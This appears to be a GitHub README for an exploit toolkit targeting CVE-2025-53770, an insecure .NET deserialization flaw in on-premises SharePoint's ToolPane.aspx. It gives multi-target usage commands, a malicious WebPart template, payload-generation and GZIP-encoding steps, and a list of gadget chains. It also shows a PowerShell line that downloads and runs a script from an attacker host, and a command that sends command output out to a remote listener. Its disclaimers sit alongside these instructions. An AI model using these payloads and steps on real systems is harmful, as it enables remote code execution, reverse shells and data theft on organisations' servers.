## 📌 SharePoint WebPart Injection Exploit Toolkit

🍕 Exploit tool for SharePoint WebPart Injection via ToolPane.aspx, leading to .NET deserialization and potential remote code execution (RCE).

**Developed by:** [@GOTOCVE](https://t.me/GOTOCVE)

---

## 🌍 Overview
This tool exploits a vulnerability in Microsoft SharePoint (on-premises) that allows authenticated users to abuse the ToolPane.aspx endpoint and inject malicious WebParts containing GZIP-compressed serialized .NET objects.

The injected object is placed inside the `MSOTlPn_SelectedWpId` parameter and embedded in a fake WebPart (such as `<Scorecard:ExcelDataSet>`) that gets parsed and deserialized by the SharePoint backend.

---

## ⚙️ Features

- ✅ Automatic endpoint validation (ToolPane.aspx)
- ✅ Injection of user-supplied payloads (GZIP+Base64-encoded .NET LosFormatter objects)
- ✅ Proxy support for Burp/ZAP
- ✅ Support for file-based or direct payload input

## 🧪 Supported Versions

| Product                      | Affected Versions           |
|-----------------------------|-----------------------------|
| SharePoint Server 2016      | 16.0.4351.1000 - 16.0.5508.1000 |
| SharePoint Server 2019      | 16.0.10337.12109 - 16.0.10417.20027 |

### ⚡ Vulnerability Summary

| Field     | Value                                          |
| --------- | ---------------------------------------------- |
| Component | Microsoft SharePoint (On-Premises)             |
| Endpoint  | `/layouts/15/ToolPane.aspx`                    |
| Parameter | `MSOTlPn_DWP`                                  |
| WebPart   | `<Scorecard:ExcelDataSet CompressedDataTable>` |
| Issue     | Insecure .NET deserialization                  |
| CVE       | **CVE-2025-53770**                             |

---

### 🧰 Toolkit Components

#### ✅ 1. `exploit.py`

Multi-threaded SharePoint exploit tool for CVE-2025-53770.

* Detects SharePoint + version
* Checks access to `/ToolPane.aspx`
* Sends malicious WebPart payload

#### ✅ 2. `YSLosf.exe`

LosFormatter Payload Generator & Deserializer.


<img width="1918" height="827" alt="image" src="https://github.com/user-attachments/assets/dbdcfa1a-1601-4a21-a871-b359407be66a" />



## 🚀 Usage

### 🔸 Basic Usage
```bash
python3 exploit.py -u https://target -p payload.txt
```

### 🔸 Multiple Targets
```bash
python3 exploit.py -f targets.txt -p payload.txt --proxy http://127.0.0.1:8080
```

### 🔸 All Arguments
| Argument      | Description                                        |
|---------------|----------------------------------------------------|
| `-u`          | Target URL (e.g., `https://sp.company.local`)      |
| `-f`          | File containing target URLs (one per line)         |
| `-p`          | Payload file or direct Base64 GZIP string          |
| `--proxy`     | Optional proxy (e.g., `http://127.0.0.1:8080`)     |
| `-t`          | Timeout in seconds (default: 15)                   |

---

### 🔧 Requirements

* Python 3.10
* Install dependencies:

```bash
python -m venv venv
source venv/bin/activate
pip install -r requirements.txt
```

* .NET 4.8 Runtime (to run `YSLosf.exe`)

---

### 💥 Payload Structure

Your payload must be:

1. A .NET object (e.g. `DataSet`, `ObjectDataProvider`)
2. Serialized using `LosFormatter` or `BinaryFormatter`
3. Base64-encoded
4. GZIP-compressed

Embedded in a WebPart like:

```aspx
<asp:UpdateProgress ID="UpdateProgress1" runat="server" AssociatedUpdatePanelID="upTest">
  <ProgressTemplate>
    <div class="divWaiting">
      <Scorecard:ExcelDataSet CompressedDataTable="{PAYLOAD}" DataTable-CaseSensitive="false" runat="server" />
    </div>
  </ProgressTemplate>
</asp:UpdateProgress>
```

---

### 🛠 Generating Payloads with `YSLosf`

#### Step 1: Create Payload File

Put your command (e.g., reverse shell) into `payload.txt`:

```powershell
powershell -nop -c iwr http://attacker/shell.ps1 | iex
```

#### Step 2: Generate Base64 Payload

```bash
C:\Users\soltanali0\Desktop\YSLosf\bin\x64\Debug\net48>.\YSLosf.exe --p payload.txt
Serialized string:
/wEFBWZsdG1j

Base64 encoded:
L3dFRkJXWnNkRzFq

C:\Users\soltanali0\Desktop\YSLosf\bin\x64\Debug\net48>.\YSLosf.exe -d dpayload.txt
Deserialized object:
fltmc
```

#### Step 3: Compress & Finalize

```python
# compress.py
import gzip, base64

with open("base64.txt", "rb") as f:
    b64 = base64.b64decode(f.read())
    gz = gzip.compress(b64)
    # print(base64.b64encode(gz).decode())
    encoded = base64.b64encode(gz).decode()

with open("payload-final.txt", "w") as out_file:
    out_file.write(encoded)
```

Save the output into `payload-final.txt` and pass it to the exploit tool.

---

### 🧵 Supported Gadget Chains

* `System.Data.DataSet`
* `System.Data.Services.Internal.ExpandedWrapper`
* `System.Windows.Data.ObjectDataProvider`
* `System.Web.UI.LosFormatter`

---

### 📡 Notes on Command Output

This vulnerability does **not return output** (e.g. `ipconfig`) in the response. You must:

* Use reverse shell payloads
* Or exfil output:

```powershell
powershell -c "ipconfig | Invoke-WebRequest -Uri http://your-ip:8000/?d=$(Get-Content -Raw)"
```

---

### ⚠️ Legal Disclaimer

> This tool is provided for **educational and authorized security testing** only.
>
> Do **not** use against systems without explicit permission.
> Misuse may be illegal and unethical.

---

## 🔍 Detection

If a vulnerable server accepts the payload and reflects `MSOTlPn_SelectedWpId` or renders the page with the injected WebPart, it's likely exploitable. No output means the deserialization failed or the server patched it.

---

## 🛑 Legal Clarification & Scope of this Tool

This tool **does not deliver or execute any shellcode, web shell.**
It only demonstrates exploitation of the **.NET deserialization vulnerability (CVE-2025-53770)** through the vulnerable `ToolPane.aspx` endpoint using a malicious WebPart structure containing a GZIP-compressed `.NET` object.

🔹 **Purpose**: To help researchers, red teamers, and defenders detect vulnerable SharePoint servers and test the injection vector safely with **custom payloads**.

🔹 **Payloads**: The tool requires users to **generate their own payloads** (e.g., using `YSLosf.exe`) which are embedded in the WebPart as Base64-encoded GZIP strings.  
It is the user’s responsibility to **choose appropriate and ethical payloads** (such as harmless `calc.exe` execution, beacon markers, etc.).

🔹 **NO Reverse Shells/Web Shells included**:  
While attackers in the wild may drop web shells like `spinstall0.aspx`, **this project does not include any such logic**.  
If you're planning on delivering a reverse shell, you **must generate your own payload manually** and **take full responsibility** for its use.


## Star History

[![Star History Chart](https://api.star-history.com/svg?repos=soltanali0/CVE-2025-53770-Exploit&type=date&legend=bottom-right)](https://www.star-history.com/#soltanali0/CVE-2025-53770-Exploit&type=date&legend=bottom-right)

### 📢 More Exploits & CVEs?


Join **[@GOTOCVE](https://t.me/GOTOCVE)** on Telegram:

* 🔍 Weekly CVE breakdowns
* 🧠 Deep exploit writeups
* 🛡 Red & Blue Team content
* 💣 Real PoCs & detection tips

## 📬 Contact
Created by [Ali Soltani](https://github.com/soltanali0)  
For research inquiries or bug reports, message via [Telegram](https://t.me/soltanali0)
